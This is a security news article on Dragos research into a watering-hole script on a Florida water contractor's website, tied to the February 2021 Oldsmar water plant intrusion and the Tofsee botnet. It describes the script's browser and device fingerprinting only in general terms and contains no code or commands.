At the beginning of February 2021, an unknown attacker compromised the computer system of a water plant in the Florida town of Oldsmar and attempted to increase the levels of sodium hydroxide (NaOH) in the water to a dangerous level. However, their effort was thwarted by the system's plant operator, who detected the intrusion and quickly acted to reverse the command, leading to minimal impact. Now, it turns out that it was not the only one incident that occurred at the time.
While digging into the water poisoning attempt, security researchers from Dragos discovered a Florida water utility contractor hosting malicious code targeting water utilities on their website, which was accessed by a user on a computer system on a network belonging to the City of Oldsmar on the same day of the poisoning event, on February 5. This was the same network where an unknown actor reportedly compromised a water treatment control plant computer, Dragos said.
The malicious script in question was designed to collect data, such as operating system and CPU, browser, including available languages, touch points, input methods, presence of camera, accelerometer, microphone, video card display adapter details, and time zone, geolocation, video codecs, screen dimensions, browser plugins. The gathered data was then sent to a database on the Heroku app site that hosted the script.
Further investigation led researchers to DarkTeam Store, a dark market that supplies thousands of customers with gift cards and accounts.
“Additional analysis of data obtained by Dragos revealed that at least a portion of this site may not actually be a dark market, but rather a check-in place for systems infected with a recent variant of botnet malware known as Tofsee. Dragos found evidence showing that the DarkTeam store and the water infrastructure construction company website were subverted by the same actor on the same day (20 December 2020),” Dragos said. The research team found 12,735 Tofsee-infected systems worldwide, which connected to the DarkTeam site.
“With the forensic information we collected so far, Dragos’ best assessment is that an actor deployed the watering hole on the water infrastructure construction company site to collect legitimate browser data for the purpose of improving the botnet malware’s ability to impersonate legitimate web browser activity,” Dragos said.
“We do not understand why the adversary chose this specific Florida water construction company site to compromise and to host their code. Interestingly, and unlike other watering hole attacks, the code did not deliver exploits or attempt to achieve access to victim computers. It is possible the actor believed that the water infrastructure construction website would allow more dwell time to collect data important for the actor’s objectives, than perhaps a busier but more closely monitored website with a dedicated security team.”